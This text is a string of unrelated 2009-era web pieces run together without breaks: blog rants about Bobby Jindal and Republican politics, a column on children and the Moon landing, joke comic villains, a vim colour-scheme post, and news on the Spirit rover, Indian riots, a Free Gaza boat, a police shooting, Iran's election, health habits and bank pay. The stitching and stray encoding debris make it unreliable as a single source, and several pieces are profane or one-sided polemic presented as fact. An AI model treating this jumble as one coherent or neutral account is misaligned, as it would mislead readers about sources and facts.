And then the speech .
Oh , Chris Matthews , you harbinger of doom , you !
It began during the liveblogging .
It is now a hugely popular internet meme .
Bobby Jindal is Kenneth the Page from 30 Rock .
( As an aside :
Is anyone else getting the impression that the producers of 30 Rock are picking the GOP up - and - comers ?
Cause Jesus God , man , they could not have PRAYED for a better way to boost the ratings of their critical darling .
Makes me wonder what would have happened had G.O.B. Bluth looked more like Dubya … )
That ’s a funny , but harmless , fact of politics .
People will mock your style .
Especially when you have to speak after a guy who ’s preternaturally gifted at holding a crowd in his hands and making them lovelovelove him ( Christ , man , CONGRESSPEOPLE were asking for autographs after Obama ’s speech ?
Are these guys 10 years old or something ? ) .
Here ’s where I get teh sadz for him , though :
He made up that whole yarn about Katrina and the sheriff .
He fucking used Katrina as a tool to try to get one over on the American people , citing a conversation with a now - dead sheriff who could n’t debunk it .
And he thought no one would notice .
What an ass , right ?
What an AMORAL PIECE OF SHIT , RIGHT ???
Like I said , maternal instincts may be playing into this , but this particular move just makes me feel sorry for this dingus .
Being so desperate to sound rational and reliable and knowledgeable about government failings that you assume you can lie about your whereabouts on a day when everyone in South Louisiana and Mississippi remembers where they were , who was there , and who was missing ?
Wow .
The desperation in that move is so thick , you can practically taste it ( why do I imagine it tastes like Aqua Velva ? ) .
Here ’s how I ’m thinking of it :
Have you ever interviewed for a job for which you were hopelessly unqualified at the time , and yet thought you might be able to squeak by on passion alone ?
So you embellish like crazy , and hope no one notices ?
This is what Jindal was doing .
This is what Palin did when she stunned the world with her daily consumption of newsprint .
It ’s a shitty thing to do , but it ’s sadly more “ relateable ” than anything else these two shitheads have ever done , as far as I ’m concerned .
They just were n’t ready , but their overeager stage parents shoved them through the curtain and onstage anyway .
Anyway , so Jindal ’s career is over , and now it ’s on to the 13 - year - old ( more on that in a moment , time allowing ) .
Think he ’ll make a speech at the next RNC convention about his personal involvement in helping America recover from FDR ’s evil socialist New Deal ?
Beware the wackos who think the Apollo missions were a hoax .
This column is n’t about their conspiracy theories or interminable e-mails written in bold with billions and billions of exclamation points .
It ’s about kids , wiser and more grounded than we realize , who know full well what happened on the moon 40 years ago but for whom the story is old news .
“ First there were dinosaurs , and then there were the astronauts .
You know , way back in the olden days , ” said Cormack Cole , 9 , checking out the space exhibit at the Denver Museum of Nature & Science .
Back in the space age , before “ moonwalk ” brought to mind moves by a dead pop star , kids would pretend jungle gyms were rocket ships .
We ’d shape snow into moon craters , hopping between them like Neil Armstrong .
No kid doubted that we — or at least our own children — someday would soar into space too .
Nearly every kid I spoke with at the museum ’s “ Space Odyssey ” was far better schooled than we ever were in matters of gravity and anti- gravity .
A 7 - year - old explained that Jupiter “ has , like , a million moons . ” A 3 - year - old pointed out that some twinkles in the sky “ are planets , not stars ” and that the first astronaut was actually a dog .
But as much as they know about space , they expressed little eagerness to explore it .
Most said they barely notice when a shuttle launches , the space station orbits or the two crafts joined like they did with a record 13 astronauts Friday .
Since the Apollo program ended and two shuttles have blown apart on live TV , it seems that blasting off to infinity and beyond has lost some of its draw .
“ It ’s not like they ’re actually going to send anybody but robots all the way to Mars anyway , ” said Cormack , a soon - to - be - third - grader .
“ They ’re totally wasting gas , ” added his buddy , Liam Fuller .
“ It ’s no duh that people used to be all excited about space and stuff , ” said Analesa Sandoval , 9 .
“ But we ’ve got work to do right here fixing problems and stuff on Earth . ”
“ Like saving the whales , ” said Theo McCallister , 8 .
“ And cancer people and people with no food , ” chimed in his 5 - year - old sister , Noelle .
“ Bumblebees , too . ”
Added 8 - year - old Logan Satterfield : “ I want to do real things , not float around in orbit . ”
Monday marks the anniversary of a triumph that still seems so sublime and futuristic that it almost makes sense why some continue to question it .
The band R.E.M. memorialized its skepticism in a song saying , “ If you believe they put a man on the moon . ”
A generation after those lyrics were written , the question is no longer whether we believe .
That ’s , as Analesa might say , “ no duh . ”
What matters is what kids are dreaming about now .
Rather than racing to follow in Armstrong ’s footsteps , their feet are firm on the ground .
They dream closer to home of standing strong and steadily here on our own planet .
Susan Greene writes Sundays , Tuesdays and Thursdays .
Reach her at 303-954-1989 or greene@denverpost.com .
A weekly comic strip , covering politics , pop culture , and the absurd .
Awful Comic Book Villains
" We suck ! "
Patient Zero " HAAACK ! "
Ventriloquistador " Yo quiero mucho oro . "
The Mediator " Let 's discuss our differences in a civil fashion "
The Evangelist " Eat my Jesus fish , sinners ! "
The Flashing Spectre " Check out my incorporeal dong ! "
Dr. Dementia " I used to be an evil genius .
Now LBJ lives in my butt . "
The Activist Hun " Legalize gay marriage , or I 'll kill your goats ! "
Salmonella Jones and His Chicken Hands
BRITAIN and the Netherlands kicked off the four - day process of electing members for the European Parliament on Thursday June 4th .
It is one of the biggest democratic exercises in the world , with over 375 m voters in 27 countries .
But some voters lack enthusiasm .
As the European Union has expanded , turnout has dwindled : from 62 % at the first election in 1979 to 45 % in 2004 .
Some blame a general decline in democratic engagement but , aside from countries with compulsory voting such as Belgium , the difference in turnout for national and European parliaments is substantial .
And worryingly for Europhiles , turnout is worst in many of the newest members of the club , in eastern Europe .
AFP
Every few months , I notice that TextMate exists and try to use it ; inevitably , the requirement that I use arrow keys defeats the endeavor .
It has a few features , however , that I like , most of which I 've ported to vim , my primary text editor .
These features are too numerous for a single post , so I 'll highlight them in a series .
First up :
An improved Python syntax definition and my favorite color scheme .
Python Syntax
The most popular Python syntax highlighting script is pretty complete , but it 's missing a few things ( Update : several of the improvements I made a year ago have been added to Dmitry Vasiliev 's script , such as decorators , doctests , imports , etc .
I 've merged the two , so this is slightly less special than before ) .
Specifically : docstrings , self , arguments / base classes , assignment as distinct from other operators , and a few other little things .
TextMate had these , so I ported them , and the results were pretty good .
Download the improved syntax file and drop it into ~/.vim / syntax .
Blackboard Color Scheme
TextMate had a color scheme that I loved : Blackboard .
The colors were primaryish without being irritatingly bright or clashing ; keywords , builtins , and class definitions were given appropriate prominence .
I ported it to Vim .
Here 's what it looks like :
That example does n't include a doctest , but they are highlighted separately in the same color as builtins .
Download the color scheme and drop it into ~/.vim / colors , then do : colorscheme blackboard to see the results .
Pretty easy on the eyes , no ?
Next in my Vim series : automatic handling of pair completion ( and deletion ) .
This panorama of images from the Spirit rover , taken on Sol 1925 ( June 2 , 2009 ) , is helping engineers assess the rover 's current state and plan her extraction from the soft soil in the region now called " Troy . "
The images were taken by Spirit 's microscopic imager instrument , mounted on the end of her robotic arm .
( PhysOrg.com ) --
A new image of Spirit 's underbelly is helping engineers assess the rover 's current state and plan her escape from soft soil .
The panoramic mosaic of multiple images was taken by the microscopic imager instrument at the end of Spirit 's robotic arm -- the first time that imager has been used to assess the underside and wheels of the rover .
The image appears blurred because the microscopic camera was designed to focus on targets just a few centimeters in front of its optics .
The imagery will assist engineers with analyses and ground - based testing to recreate the rover 's conditions before testing various options for extracting it from its current location .
This panorama of images from the Spirit rover , taken on Sol 1925 ( June 2 , 2009 ) , is helping engineers assess the rover 's current state and plan her extraction from the soft soil in the region now called " Troy . "
The images were taken by Spirit 's microscopic imager instrument , mounted on the end of her robotic arm .
This is the first time the microscopic imager has been used to assist in planning a rover 's escape from an embedding event .
The imager is n't intended to take these types of images -- it is designed to focus on targets only 6 centimeters ( 2.4 inches ) in front of its optics .
As a result , the images in this mosaic are well out of focus .
Yet despite the focus and the backlighting of the scene , the mosaic is still very useful for helping to assess the rover 's state .
The mosaic , which is rotated to show the true orientation of the rover relative to the local terrain , shows the underside of the rover , the depth to which the wheels are embedded and the terrain itself in sufficient detail .
Provided by JPL / NASA ( news : web )
Explore further Spirit Sitting Pretty On A Martian Hillock
NEW DELHI , India ( CNN ) --
Three people have been killed in religious rioting in southern India between Muslims and Hindus , police said Friday .
Widespread violence broke out in Mysore Thursday after somebody threw a dead pig into the compound of an under - construction mosque , city police commissioner Sunil Agarwal told CNN .
More than a dozen people were injured in the clashes , he said .
Police fired tear gas and used bamboo sticks to break up the rioting , according to Agarwal .
Authorities have , for now , banned assembly of five or more people on the streets of the troubled area , according to the police .
Mysore is a city in Karnataka , India 's only southern state governed by the Hindu nationalist Bharatiya Janata Party .
FOR IMMEDIATE RELEASE
30 June 2009
ISRAEL ATTACKS JUSTICE BOAT ; KIDNAPS HUMAN RIGHTS WORKERS ; CONFISCATES MEDICINE , TOYS AND OLIVE TREES
For more information contact :
Greta Berlin ( English )
tel : +357 99 081 767 / friends@freegaza.org
Caoimhe Butterly ( Arabic / English / Spanish ) :
tel : +357 99 077 820 / sahara78@hotmail.co.uk
www.FreeGaza.org
[ 23 miles off the coast of Gaza , 15:30 pm ] - Today Israeli Occupation Forces attacked and boarded the Free Gaza Movement boat , the SPIRIT OF HUMANITY , abducting 21 human rights workers from 11 countries , including Noble laureate Mairead Maguire and former U.S. Congresswoman Cynthia McKinney ( see below for a complete list of passengers ) .
The passengers and crew are being forcibly dragged toward Israel .
" This is an outrageous violation of international law against us .
Our boat was not in Israeli waters , and we were on a human rights mission to the Gaza Strip , " said Cynthia McKinney , a former U.S. Congresswoman and presidential candidate .
" President Obama just told Israel to let in humanitarian and reconstruction supplies , and that ’s exactly what we tried to do .
We 're asking the international community to demand our release so we can resume our journey . "
According to an International Committee of the Red Cross report released yesterday , the Palestinians living in Gaza are " trapped in despair . "
Thousands of Gazans whose homes were destroyed earlier during Israel ’s December / January massacre are still without shelter despite pledges of almost $ 4.5 billion in aid , because Israel refuses to allow cement and other building material into the Gaza Strip .
The report also notes that hospitals are struggling to meet the needs of their patients due to Israel ’s disruption of medical supplies .
" The aid we were carrying is a symbol of hope for the people of Gaza , hope that the sea route would open for them , and they would be able to transport their own materials to begin to reconstruct the schools , hospitals and thousands of homes destroyed during the onslaught of " Cast Lead " .
Our mission is a gesture to the people of Gaza that we stand by them and that they are not alone " said fellow passenger Mairead Maguire , winner of a Noble Peace Prize for her work in Northern Ireland .
Just before being kidnapped by Israel , Huwaida Arraf , Free Gaza Movement chairperson and delegation co-coordinator on this voyage , stated that : " No one could possibly believe that our small boat constitutes any sort of threat to Israel .
We carry medical and reconstruction supplies , and children ’s toys .
Our passengers include a Nobel peace prize laureate and a former U.S. congressperson .
Our boat was searched and received a security clearance by Cypriot Port Authorities before we departed , and at no time did we ever approach Israeli waters . "
0A
Arraf continued , " Israel ’s deliberate and premeditated attack on our unarmed boat is a clear violation of international law and we demand our immediate and unconditional release . "
###
WHAT YOU CAN DO !
CONTACT the Israeli Ministry of Justice
tel : +972 2646 6666 or +972 2646 6340
fax : +972 2646 6357
CONTACT the Israeli Ministry of Foreign Affairs
tel : +972 2530 3111
fax : +972 2530 3367
CONTACT Mark Regev in the Prime Minister 's office at :
tel : +972 5 0620 3264 or +972 2670 5354
mark.regev@it.pmo.gov.il
CONTACT the International Committee of the Red Cross to ask for their assistance in establishing the wellbeing of the kidnapped human rights workers and help in securing their immediate release !
Red Cross Israel
tel : +972 3524 5286
fax : +972 3527 0370
tel_aviv.tel@icrc.org
Red Cross Switzerland :
tel : +41 22 730 3443
fax : +41 22 734 8280
Red Cross USA :
tel : +1 212 599 6021
fax : +1 212 599 6009
###
Kidnapped Passengers from the Spirit of Humanity include :
Khalad Abdelkader , Bahrain
Khalad is an engineer representing the Islamic Charitable Association of Bahrain .
Othman Abufalah , Jordan
Othman is a world - renowned journalist with al - Jazeera TV .
Khaled Al - Shenoo , Bahrain
Khaled is a lecturer with the University of Bahrain .
Mansour Al - Abi , Yemen
Mansour is a cameraman with Al - Jazeera TV .
Fatima Al - Attawi , Bahrain
Fatima is a relief=2 0worker and community activist from Bahrain .
Juhaina Alqaed , Bahrain
Juhaina is a journalist & human rights activist .
Huwaida Arraf , US
Huwaida is the Chair of the Free Gaza Movement and delegation co-coordinator for this voyage .
Ishmahil Blagrove , UK
Ishmahil is a Jamaican - born journalist , documentary film maker and founder of the Rice & Peas film production company .
His documentaries focus on international struggles for social justice .
Kaltham Ghloom , Bahrain
Kaltham is a community activist .
Derek Graham , Ireland
Derek Graham is an electrician , Free Gaza organizer , and first mate aboard the Spirit of Humanity .
Alex Harrison , UK
Alex is a solidarity worker from Britain .
She is traveling to Gaza to do long - term human rights monitoring .
Denis Healey , UK
Denis is Captain of the Spirit of Humanity .
This will be his fifth voyage to Gaza .
Fathi Jaouadi , UK
Fathi is a British journalist , Free Gaza organizer , and delegation co-coordinator for this voyage .
Mairead Maguire , Ireland
Mairead is a Nobel laureate and renowned peace activist .
Lubna Masarwa , Palestine / Israel
Lubna is a Palestinian human rights activist and Free Gaza organizer .
Theresa McDermott , Scotland
Theresa is a solidarity worker from Scotland .
She is traveling to Gaza to do long - term human rights monitoring .
Cynthia McKinney , US
Cynthia McKinney is an outspoken advocate for human rights and social justice issues , as well as a=2 0 former U.S. congressperson and presidential candidate .
Adnan Mormesh , UK
Adnan is a solidarity worker from Britain .
He is traveling to Gaza to do long - term human rights monitoring .
Adam Qvist , Denmark
Adam is a solidarity worker from Denmark .
He is traveling to Gaza to do human rights monitoring .
Adam Shapiro , US
Adam is an American documentary film maker and human rights activist .
Kathy Sheetz , US
Kathy is a nurse and film maker , traveling to Gaza to do human rights monitoring .
Two deputies apparently mistook a cellphone for a gun when they fatally shot an unarmed 22 - year - old man in Athens , authorities said Monday .
A Los Angeles County Sheriff ’s Department spokesman said Woodrow Player Jr. twice pointed a “ dark object ” at deputies during a foot chase Friday , causing them to believe that he was armed with a handgun .
The second time he pointed the object at deputies , they opened fire .
When investigators searched the alley where the shooting occurred , they recovered a cellphone next to Player , not a gun , said sheriff ’s spokesman Steve Whitmore .
“ It appears the dark object was a cellphone , ” Whitmore said .
Advertisement
Investigators found a loaded gun in a car from which Player had fled , but it was several hundred feet from where he was shot .
The incident began about 9 p.m. when deputies pulled up to Player ’s parked vehicle because he matched the physical and clothing description of a man who had threatened some people in the area with a gun .
But when deputies approached the car , he ran across the Imperial Highway and into an alley , Whitmore said .
Whitmore said sheriff ’s internal affairs detectives interviewed witnesses who said they too believed Player had pointed a gun at the deputies before he was shot .
“ We had a witness who said they saw a muzzle flash , ” Whitmore said .
But Shendall Duncan , 35 , of Athens told the Times it appeared to her that Player was unarmed .
She said she saw deputies shoot Player three times in the back before he fell .
He attempted to keep running and was shot again , she said .
Advertisement
Whitmore said the incident was being investigated by the department , the county ’s Office of Independent Review and the L.A. County district attorney ’s office .
Sheriff ’s officials refused to identify the deputies involved in the shooting .
Player ’s family , along with Earl Ofari Hutchinson , president of the Los Angeles Urban Policy Roundtable , and Eddie Jones of the L.A. Civil Rights Assn. , said they wanted a federal inquiry .
“ We have no confidence in the Sheriff ’s Department to investigate itself , ” Hutchinson said .
Player had been affiliated with the East Coast Crips , had served time in prison on a drug charge and was on parole at the time he was shot , according to relatives .
He was acquitted of a murder charge last year and had since been trying to turn his life around , attending church and studying to get his high school diploma , they said .
Advertisement
--
richard.winton@latimes.com
THE Family First senator Steve Fielding has challenged the work of thousands of the world 's top scientists , saying he is not convinced by the work done by the Intergovernmental Panel on Climate Change .
Senator Fielding is on a lightning self - education campaign in the science of climate change as he prepares to decide how to vote on the Federal Government 's emissions trading legislation .
" Like most Australians , I 've just believed that man-made carbon emissions are the major cause of global warming and up until now have not really looked at it in great detail , " Senator Fielding told ABC radio yesterday .
" Then all of a sudden someone said , ' Steve , do you know that over the last decade carbon emissions are rising but global temperature is n't rising ? ' "
Senator Fielding said he wanted to find the real cause of climate change .
The streets are clogged with traffic so we get on the highway , the windows down and music blaring .
I am with two friends , driving through Tehran after midnight , enjoying the cool air with no particular destination .
One of them grabs a poster for Mahmoud Ahmadinejad from a passing motorcyclist and begins waving it at the other drivers , most of them stunned that a fashionable woman wearing hijab lite would support the hard - line Iranian president .
“ Are you serious ? ” one man tells her .
“ Do you know what Ahmadinejad ’s [ Islamic ] Guidance Patrol would do to you if they saw you ? ”
A car full of other friends pulls up alongside .
They are holding up posters of former Prime Minister Mir-Hossein Mousavi , a moderate who is Ahmadinejad ’s top rival in the presidential election Friday .
Advertisement
“ Doctor , go to the doctor ! ” they chant , a popular slogan mocking both Ahmadinejad ’s doctoral degree in traffic management and his mental health .
“ Only Ahmadinejad ! ” my friends chant back , laughing .
We speed up , and they speed up , two Peugeot 206 hatchbacks racing down the highway into the early morning , dancing perilously past each other at 70 mph .
The cars jamming the streets of late - night Tehran , mostly full of young people , are talking to each other : beep , beep , beep - beep - beep .
Even though it ’s a workweek night , all sorts of people are out , holding up flags and banners of green , the Mousavi campaign ’s official color , as the cars inch past the crowds , their horns honking in what has emerged as a distinctive call sign of Mousavi ’s supporters .
Advertisement
One street rally has turned into a disco , with young men dancing to pop music and women standing up through sunroofs cheering them on .
“ You do n’t know how to dance ! ” one woman calls out cheerily to a group of young men wearing green T - shirts .
“ Dance better ! ”
These are strange , magical days in Iran , where a landmark presidential race pitting Ahmadinejad against Mousavi and two other challengers has opened up the country ’s political and public spaces to an extent not seen since the 1979 Islamic Revolution .
Students have called the president a liar to his face .
Carnival - like demonstrations erupt on the streets .
Ordinary people engage in lively political debates with strangers on street corners .
In big cities such as Esfahan and Tehran , caravans of motorcyclists stream down roadways nightly , sometimes with two people riding pillion .
With one hand clutching each other for dear life , they hold up the green balloons and banners of the Mousavi campaign or the red , white and green Iranian flag , which has become the symbol of the Ahmadinejad campaign , as they roar past .
Advertisement
In the countryside , campaign posters plaster walls in sleepy , ancient mud -brick enclaves far from the main highways , where women in all - covering black chadors sweep past stark golden desert landscapes .
Shopkeepers , farmers and retirees hold impromptu debates , disagreeing amicably with one another , over the country ’s problems and talking about its leaders -- in years past almost all would have been turbaned clerics above reproach -- as if they were athletes battling it out on the sports field .
It ’s been a thrilling ride , with impromptu rallies sprouting in town and city squares alike .
But beneath the good - spirited fun , there is an undercurrent of danger , highlighted by the walkie - talkie - toting plainclothes security officials hovering around the crowds and the nasty bare - knuckled chants that the rival groups hurl at each other .
In addition to revealing the repressed swell of youthful energy , the election season has laid bare Iran ’s many divisions : between rural and urban ; religious and secular ; working - class and educated ; old and young ; those for whom the outside world remains a threat to their way of life and those who look outside Iran for ideas and opportunities .
Advertisement
Iran tends to loosen up during quadrennial presidential and parliamentary elections .
The debates get a little more heated and street life a little less staid .
But you never had anything like this year , when many of the country ’s top power brokers , in a bid to defeat Ahmadinejad , used the levers of government to open up the campaign by allowing late - night campaigning and television debates .
You never had people spray - painting “ Freedom ! ” on their vans and marching in spur - of - the - moment parades .
You never had the candidates on live television discussing state secrets , such as the president ’s unsuccessful alleged attempt to give millions of dollars to foreign governments , that once were only whispered about .
You never had candidates openly accusing each other of corruption , cronyism and lying .
Advertisement
And you never had an incumbent president holding up the apparent intelligence dossier of the wife of his chief opponent , live on television .
“ Should I say ?
Should I say ? ” Ahmadinejad taunted Mousavi , in what has since become a campaign slogan for the president ’s rivals .
“ When Mahmoud comes up short , ” one chant goes , “ he drags the womenfolk into the middle of it . ”
“ When Mousavi comes up short , ” the opposing chant goes , “ he brings in a bunch of sissy boys . ”
Advertisement
In short , Iran has never been so fun .
A lengthy late - spring rainstorm discourages no one .
Throngs of people stand out along Vali Asr Street , some covering themselves with campaign posters , others nonchalantly getting soaked in front of the headquarters of the state broadcasting authority , waiting for Mousavi to emerge .
“ Ahmadinejad , listen up !
Get out of Iran ! ” they chant .
I ’ve given up taking cars anywhere , instead just walking and trying to hail taxis or even random strangers .
During this political season , Tehran traffic , always horrific , has graduated to apocalyptic , with Mousavi ’s supporters flooding roadways to counter Ahmadinejad ’s advantages in the media , and the president ’s supporters quickly calling out loyal Basij militiamen in response .
Advertisement
The big cities are a seeming lock for Mousavi , as are the northwestern provinces near Azerbaijan , where the country ’s most influential ethnic minority loves the former prime minister , who is himself Azeri .
But Mousavi supporters acknowledge they ’ll probably lose the votes of the rural and urban poor who were the beneficiaries of Ahmadinejad ’s populist economic programs .
In the course of four years , he handed out billions of dollars in low - or no-interest housing , agricultural and wedding loans that spurred inflation and real estate speculation but gave a short - term economic fix to the nation ’s poor and pious .
“ They gave out loans to people who could have never built houses otherwise , ” says Reza Shah - Ragabi , 40 , who grows watermelons in the central Iranian village of Gorgab .
“ We support Ahmadinejad because he shares the rural worldview . ”
Advertisement
Still , there are some signs that not everyone in the countryside supports the president .
In a field outside the tiny hamlet of Habibabad , 20 - year - old Gholam - Reza Ravanbakhsh works amid his father ’s alfalfa , but dreams of a different life .
He got his high school diploma and wants to study engineering , maybe travel abroad .
His entire family will vote for Ahmadinejad , but he confides that he ’s likely to vote for Mousavi .
“ For me the most important thing is the future of the young people , ” he says , wiping the dust from his eyeglasses .
Ahmadinejad ’s mostly poor urban supporters are more inchoate .
Their bond to the president is emotional more than intellectual .
Advertisement
“ He ’s very brave , ” says one female supporter of the president , who declines to give her name .
“ He stood up to the West on our nuclear program and he stood up to the fat cats here . ”
“ What did you get out of that ? ” I ask .
“ What do you mean ? ”
“ How did you benefit from his bravery ? ”
Advertisement
She pauses .
“ He made us feel proud , ” she says .
Iran is a young country , in more ways than one .
Not only are the demographics heavily weighted toward those under 30 , but the culture gives special consideration to youths , who are valued and spoken about with almost as much reverence as the elderly .
“ What about the young people ?
I feel sorry for them .
What will become of them ? ”
You hear that a lot from Iranians .
In Ahmadinejad ’s attempts to stifle the joyous spirit of youth and restore the austerity and piety of the early years after the revolution , he may have sown the seeds of his own downfall .
Advertisement
He has angered an entire generation of apolitical young Iranians more inclined to party than organize , more interested in pursuing ambitious careers and remodeling their noses than campaigning on the streets .
The “ sissy boys ” and girls from uptown who like to dance to cheap Persian pop music and drink homemade booze late into the night are out on the streets rallying against him .
“ He ’s beat us down so much , ” says Adeleh , a black - haired 30 - year - old Tehran dentist and Mousavi supporter who describes how she was detained one day a few months ago by the dreaded Guidance Patrol , the morality police , who hauled her to jail for wearing an outfit not deemed Islamic enough .
“ Look at me ! ” she says , pointing to her elegant black coat and head scarf .
“ Do I look improper ?
When I told them I was a dentist , they were almost worse toward me , as if it was a crime to be a professional woman . ”
Along Vali Asr Street , a young woman wearing battery - powered green devil ’s horns hangs out a car window .
She holds her hands up in a victory salute as a group of motorcyclists holding Ahmadinejad posters courses past through the clogged traffic .
She and the young men scowl disapprovingly at each other , but say nothing .
Advertisement
--
daragahi@latimes.com
" Disgusting things you 'd never anticipate "
In his Southern - accented monotone , the Alabama native urges colleagues on Capitol Hill to block President Obama ’s agenda and lower their sights toward incremental changes in health and energy policy .
While Mr. Schwarzenegger exhorts the White House to “ never give up , ” Mr. McConnell criticizes the president ’s push to “ raise taxes in the middle of a recession ” to cover those without insurance .
Six months after President George W. Bush left the stage , neither brand of Republicanism fares especially well with the public .
But there is no doubt which holds more midsummer box - office appeal among the party faithful -- and it is not the Terminator’s .
We 've asked it before -- and in the words of the B - 52's -- who 's to blame ?
Who 's to blame for the downfall of the Republican Party ?
One might be tempted to say " the death " of the Republican Party , but history tells us that the Republicans will come back and that we 'll look forward to that day as the Democrats descend into the dark bowels of the complete corruption that already dominates almost as much of it as has dominated the GOP for so long .
But respected Ohio senior Senator George Voinovich thinks he knows what has caused the temporary demise -- what and who -- at least for his own state of Ohio .
He told the“ We got too many Jim DeMints ( R - SC ) and Tom Coburns ( R - OK ) .
It ’s the southerners .
They get on TV and go ' errrr , errrrr . '
People hear them and say , ‘ These people , they ’re southerners .
The party ’s being taken over by southerners .
What they hell they got to do with Ohio ? '" Can the same be said for GOP trouble around the country ?
In yesterday's , John Harwood contrasts the dwindling number of Republican moderates interested in goverance to the neo-Confederate fanatics interested in ... wrecking government and preventing President Obama from having a successful presidency .
Harwood askes us to behold " the slight , dour spokesman for orthodox Republicanism .
Senator Mitch McConnell of Kentucky , leader of the shrunken Republican minority , will never be mistaken for a bodybuilder or a movie star " ... or a moderate .
Wingnut fanatics are livid , attacking Voinovich already and reminding everyone that he stopped one of Bush 's most horrible appointments , clueless fascist dupe John Bolton .
They much prefer slash and burn obstructionists like Coburn and DeMint , who , like them and their leader Rush Limbaugh , would rather see America fail than Obama succeed .
Who 's to blame ?
The B -52's are from Georgia , but unlike lunatic fringe politicians like Johnny Isakson , Newt Gingrich , Lynn Westmoreland , Tom Price , Jim Marshall , Jack Kingston , John Linder , John Barrow , Nathan Deal , Phil Gingrey , Saxby Chambliss and Paul Broun , they 'reto blame .
Labels : B -52's , Coburn , crazy extremists , Jim DeMint , Voinovich
NEW YORK ( Reuters Health ) -
The number of middle - aged and older Americans who eat right , exercise and keep their weight down has declined substantially in the past two decades , a new study finds .
Garlic fries are displayed in New York April 15 , 2009 .
REUTERS / Eric
Thayer
Using data from a large government health survey , researchers found that in 2006 , only 26 percent of Americans ages 40 to 74 said they ate five or more servings of fruits and vegetables per day -- down from 42 percent in 1988 .
When it came to exercise , 43 percent said they worked out at least 12 times per month , versus 53 percent in 1988 .
Perhaps not surprisingly , the rate of obesity went in the opposite direction , from 28 percent in 1988 to 36 percent in 2006 , the researchers report in the June issue of the American Journal of Medicine .
The decline in healthy lifestyle habits is disturbing because it may translate into higher rates of diseases like type 2 diabetes and heart disease , said lead researcher Dr. Dana E. King , of the Medical University of South Carolina in Charleston .
What ’s more , he told Reuters Health , study participants who already had heart disease , high blood pressure or diabetes were no more likely to be adhering to a healthy lifestyle than those without the conditions .
“ This tells us that many patients are not following the recommended lifestyle changes , ” King said , noting that this may be because many people instead rely on medication to control their health problems .
The findings are based on data from the National Health and Nutrition Examination Survey , a regularly conducted government health survey .
King ’s team focused on surveys conducted between 1988 and 1994 and between 2001 and 2006 , which together included more than 15,000 Americans between the ages of 40 and 74 .
The researchers looked at rates of five lifestyle factors involved in the risk of a range of health problems : maintaining a normal weight , getting regular exercise , eating enough fruits and vegetables , not smoking and drinking moderate amounts of alcohol .
In 1988 , just 15 percent of Americans in this age group adhered to all five recommendations .
By 2006 , that figure had dropped to 8 percent , the researchers found .
While regular exercise and fruit and vegetable intake dropped over time , the rate of smoking remained steady , at about 26 percent .
Moderate drinking -- up to one drink per day for women , and two drinks per day for men -- was the one lifestyle change Americans were willing to make , the study found .
That rate increased from 40 percent to 51 percent .
The study cannot tell us why healthy lifestyle habits are on the decline , King said .
“ But one reason , ” he said , “ may be that these changes are just difficult to make . ”
People ’s increasingly hectic lives may be making it hard to fit in regular exercise , or to sit down to healthier , home - cooked meals rather than eating take - out , the researcher noted .
However , he said , some simple steps can make a difference .
“ It ’s not hard , for example , to take some fruit to work with you , instead of going to the vending machine , ” King said .
He also stressed that “ it ’s never too late ” for middle - aged and older adults to make lifestyle changes for the better .
In an earlier study , King and his colleagues found that when middle - aged adults newly adopted a healthier lifestyle -- including regular exercise and eating more fruits and vegetables -- their risk of developing cardiovascular disease or dying over the next several years fell by as much as 40 percent .
SOURCE : The American Journal of Medicine , June 2009 .
TEN years ago DVDs rejuvenated the film business , encouraging people to own films rather than simply watch them .
But sales , which began declining gradually in 2006 , are now falling more steeply .
Around a third of the drop in the first quarter was counteracted by rising sales of high - definition Blu-ray discs , which are more profitable .
Meanwhile , rentals are booming .
Redbox , which rents films cheaply from self - service kiosks , has been adding machines at the rate of more than 500 per month .
For the studios it is much more profitable to stream a film digitally or sell it through a cable operator as a video - on - demand ( VOD ) .
Shutterstock
While workers ’ wages fall
Obama administration rejects limits on bankers ’ pay
By Patrick Martin
11 June 2009
The Obama administration announced Wednesday that it opposed any government - imposed limits on the salary and bonuses of the CEOs and other top officials of major banks that have received trillions of dollars in federal handouts and guarantees over the past eight months .
Coming only nine days after the White House forced bankruptcy on General Motors and major cuts in auto workers ’ pay and benefits , the green light for CEOs to continue to award themselves eight - digit compensation packages is further evidence of the grotesque double standard of American capitalism .
Workers , retirees , young people and small businessmen will all see their living standards and future prospects devastated , but nothing can be allowed to interfere with the pursuit of personal wealth by the financial aristocracy .
“ We do not believe it ’s appropriate for the government to set caps in compensation , ” Treasury Secretary Timothy Geithner said in announcing the administration ’s policy for companies which have received federal bailouts through the Troubled Asset Relief Program ( TARP ) .
“ We ’re not going to prescribe detailed prescriptive rules for compensation , ” he continued .
“ All those things would be ineffective , could be counterproductive in some ways . ”
Neither Geithner nor any other Obama administration official has explained why it is wrong and “ counterproductive ” to limit the multi-million - dollar salary and bonus packages awarded to bank executives , but absolutely necessary to slash the wages , pensions and health benefits of workers at General Motors , Chrysler and their supplier plants .
Well aware of the popular resentment against stratospheric salaries and bonuses for the financiers whose speculative practices precipitated a worldwide economic crisis , the Obama administration has offered a fig leaf of restraint on compensation .
Geithner said the administration would ask Congress to give shareholders a consultative voice on executive pay and authorize the Securities and Exchange Commission ( SEC ) to require corporate compensation committees to be more independent of company management .
( Most CEOs have their pay and bonuses set by their cronies on the board of directors , often appointed by the CEOs themselves ) .
To call these measures toothless would be to exaggerate their significance .
The shareholder votes would be non-binding .
The compensation committees would still be selected by the corporate board and the CEO .
There would be no outside regulatory supervision or control .
And , of course , the workers would have no say whatsoever in the decision to award their bosses compensation packages hundreds if not thousands of times their own pay .
In his statement , Geithner made a pro forma acknowledgment that CEO pay played a role in the crisis .
“ This financial crisis had many significant causes , ” he said , “ but executive compensation practices were a contributing factor .
Incentives for short - term gains overwhelmed the checks and balances meant to mitigate against the risk of excess leverage . ”
Geithner declared that the first principle of his “ reform ” was that “ compensation plans should properly measure and reward performance . ”
This is a sham .
The CEOs of the major banks and investment houses do not create any real wealth .
Their “ labor ” consists of the manipulation of financial assets .
This activity is entirely parasitic , and in the recent period catastrophically destructive .
To “ properly measure and reward ” the performance of these gentlemen would require criminal investigations and public trials , not multi-million - dollar payoffs .
There are some differences between the measures proposed by Geithner Wednesday and those originally proposed by the Obama administration on February 4 , as part of its initial reformulation of the TARP program .
Other limited restraints were introduced into the stimulus package enacted by Congress in February , in an amendment drafted by Democratic Senator Christopher Dodd , chairman of the Senate Banking Committee .
But no version provides any serious obstacle to the bankers and CEOs resuming their mania for self - enrichment .
